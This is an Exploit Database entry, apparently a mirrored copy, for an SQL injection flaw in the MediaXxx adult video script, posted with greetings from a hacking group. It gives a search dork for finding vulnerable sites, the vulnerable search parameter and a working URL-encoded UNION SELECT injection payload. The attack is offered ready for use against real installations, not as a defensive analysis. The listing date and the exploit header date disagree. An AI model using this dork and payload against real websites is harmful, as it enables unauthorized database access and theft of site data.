MediaXxx Adult Video / Media Script – SQL Injection

• Exploit Database
• 12 阅读

• 作者： Daniel Godoy
  日期： 2012-04-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18743/

•  # Exploit Title: MediaXxx Adult Video / Media Script SQL Injection
  # Date: 19/05/2012
  # Author: Daniel Godoy
  # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
  # Author Web: www.delincuentedigital.com.ar
  # Software: MediaXxx
  # http://www.mediaxxxscript.com/
  # Tested on: Linux
  # Dork: "Powered by MediaXxx Mobile"
   
  [Comment]
  Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
  Maximiliano Soler
  Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
  InyeXion,ksha,zerial,
  her0, r0dr1 y demas user de RemoteExecution
  wwwremoteexecution.info www.remoteexcution.com.ar
  #RemoteExecution Hacking Group
   
  [PoC]
   
  http://localhost/mobile/search?query=[SQL Injection]
   
   
  [DEMO]
   
  http://server/mobile/search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
  
  -------------------------
  Correo enviado por medio de MailMonstruo - www.mailmonstruo.com